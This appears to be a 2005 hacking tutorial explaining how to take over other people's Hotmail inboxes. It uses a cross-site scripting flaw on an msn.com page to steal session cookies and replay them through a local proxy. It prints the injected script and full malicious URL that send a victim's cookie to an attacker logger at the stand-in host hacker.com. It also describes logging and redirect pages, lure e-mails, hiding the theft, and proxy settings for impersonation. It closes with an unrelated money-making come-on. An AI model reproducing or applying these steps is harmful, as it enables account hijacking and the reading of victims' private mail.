What is this document about
In this document I explain how to exploit
a security hole I found in
http://www.hotmail.com/. This is not fiction, but a real story and
still works as of today (2005-06-04). With this exploit you can access
other people's mailboxes, view their contacts and much more. All that
needs to be done is send this user an e-mail with a link/url to an
internet-page you created. When this user clicks on this url, his inbox
is all yours.
I've tried to explain the situation as simple as possible, so that
anyone can understand it.
How does it work
One of the following things is needed to
login into Hotmail:
- When you know his/her e-mail address
and password you can login with his username and password on
http://www.hotmail.com/
- When you know his/her account
information like country and zip-code, and you are able to answer
his/her secret question. In this case You can reset his/her
password, and login just like option 1, with a new password.
- When you have access to his alternate
e-mail address, you could send a password reset e-mail message to
that account to reset his/her password.
- When you have his/her 'cookie' for
passport.net or hotmail.msn.com you can 'fake' his/her cookie, and
make hotmail believe you are already logged in as this user.
I am using Option 4 to make my exploit
work. This exploit is using the cookie from hotmail.msn.com to access
the 'victims' inbox. Because the cookie is not limited to the domain
hotmail.msn.com, I can also use an exploit on the site msn.com to steal
the cookie from the victim. When I searched msn.com for an exploit
called "HTML Injection" or "Cross Site Scripting" (XSS), it took me
about 30 minutes to find one. With this exploit type I'm able to insert
additional pieces of html or javascript into a page
of msn.com. When I insert the
code:
<SCRIPT>alert(document.cookie)</SCRIPT>
,
the user will see a message box just like the picture below when
he visits that site.
The real HTML injection example with popup can be viewed at:
http://ilovemessenger.msn.com/?mkt=nl-nl');alert(document.cookie);escape('
With the text you can see in the "alert message-box" above, everybody
with some knowledge is able to access my inbox. This text is send by my
browser to hotmail every time I visit a site with the domain "msn.com".
This method is used so hotmail knows I am still logged in. The text in
the popup is called a "cookie". A trick used by attackers is to fake
somebody else's cookie. I will explain one easy method, although there
are different ways of doing it. I can fake cookies with a helper program
called "Proxomitron". Proxomitron acts like a proxy server with the
option to change, fake or block html headers. Cookie-text, like the text
in the popup, is send by the browser invisibly in an html-header called
"cookie". Because Proxomitron is able to fake headers, this program is
very useful to me.
I will explain later how proxomitron must be configured to fake cookies.
How does the attacker get the cookie? Showing a popup to the user with
his cookie information does not help the attacker. The attacker wants
the text now shown in the popup-box. To log cookies the hacker needs to
create a internet-page with PHP or ASP. This is to log some text to a
log file on a webserver. I've created a simple PHP script that is able
to log text to a log file. I've named this file "cookielogger.php" and
its content looks like this:
I uploaded this file to a webserver. As example I'll
use the fake internet site
http://www.hacker.com/ To test the PHP script I'll go to
http://www.hacker.com/cookielogger.php?cookie=test
I can see the text "Successfully wrote a string to the log file". When
I'm now browsing to
http://www.hacker.com/logfile.txt I can see the text "test".
When I go to http://www.hacker.com/cookielogger.php?cookie=this text
is being logged the text "this text is being logged" will be
appended to the log file:
http://www.hacker.com/logfile.txt
Cookielogger.php is now ready to log text strings, so it's also ready to
log cookies. I use the Cross Site Scripting exploit to inject a code
that will redirect the user to
http://www.hacker.com/cookielogger.php
with the argument "cookie" filled with the user's cookie. So when the
user visits the msn site with added code, he will be redirected to
http://www.hacker.com/cookielogger.php?cookie=hiscookie and the
hacker can read his cookie information at the site
http://www.hacker.com/logfile.txt
because "hiscookie" is now logged to a textfile the hacker can see. the
code I'm inserting in msn.com will look like this:
<SCRIPT>location.href='http://www.hacker.com/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT>
See the two printscreens below of the results with the cookielogger.
Remember "www.hacker.com" is not really used, its just an
example.
The real HTML injection example to log the cookie is:
http://ilovemessenger.msn.com/?mkt=nl-nl');location.href='http://www.hacker.com/cookielogger.php?cookie='+escape(document.cookie);escape('
Okay, the exploit is ready to go. We could send the link above to the
victim in the hope he clicks the link. But there aren't many people who
go to a site like "ilovemessenger.msn.com". Also when the users sees
something like "document.cookie" in the url he'll probably think twice
before clicking it.
When we create a new php page called "redirect.php" with the following
content:
and place this file online on
http://www.hacker.com/redirect.php Now when we send the victim
an email with this link and he clicks on it he will be redirected to the
ilovemessenger site plus exploit, here he will be redirected to
hacker.com/cookielogger.php with his cookie of msn.com being logged in
the log file.
When these actions are completed you are ready to start exploiting the
victim. If anyone really would try to break into somebody's hotmail
account he also would change cookielogger.php to redirect on, or to show
an innocent message, so that the user wouldn't notice that his cookie
was logged.
When a malicious hacker sends an e-mail containing the link to the
redirect script and the victim opens his new e-mail message he will see
something like this:
When
the victim clicks the text "click this link" the exploit will come in
motion. In real life there are tons of methods of persuading the victim
to click on a link. The hacker is patiently waiting for a new entry in
the file http://www.hacker.com/logfile.txt. When the user finally
clicks the link and the hacker notices extra text in the log file the
fun can start. When the victim is fallen for your trick, the log file
looks like this:
Now
the hacker has stolen the cookie of the victim, the hacker can proceed
in faking his cookie when entering hotmail. Somewhere at the start of
this explanation I talked about "Proxomitron" to fake cookies. I will
now explain how to make the settings to fake this cookie.
Proxomitron looks like this:
Just
place a 'v' before "Outgoing Header Filters" because that's what we want
to do. We want to send the users cookie to the web server as it is or
own cookie. Press the button "Headers" to create a new header to fake
the cookie.
In the new window, fill in these values:
HTTP Header:
"Cookie: a description"
URL Match: ""
Header Value Match: "*"
Replacement test: the users cookie
Apply
the new header by putting a 'v' before the new header in the "Out"
column and press apply to save the changes.
Proxomitron
is now ready for faking the cookie. Now setting up your browser. You
need to set your browser to use a proxy-server. It differs per browser
how to make that setting.
In Internet Explorer: "Tools -> Internet Options... -> Connections ->
LAN Settings -> Proxy server"
In Mozilla Firefox: "Tools -> General -> Connection Settings -> Manual
proxy configuration"
Set the Address to "127.0.0.1" (your own pc) and as port : "8080" (the
port of Proxomitron proxy server)
When your browser is setup to use your own proxy server, you can go to
the following url :
http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes
When
successful you can now see the inbox of the victims mail box.
Wanna Make some money?
If
you have access to your own email account, you can get paid.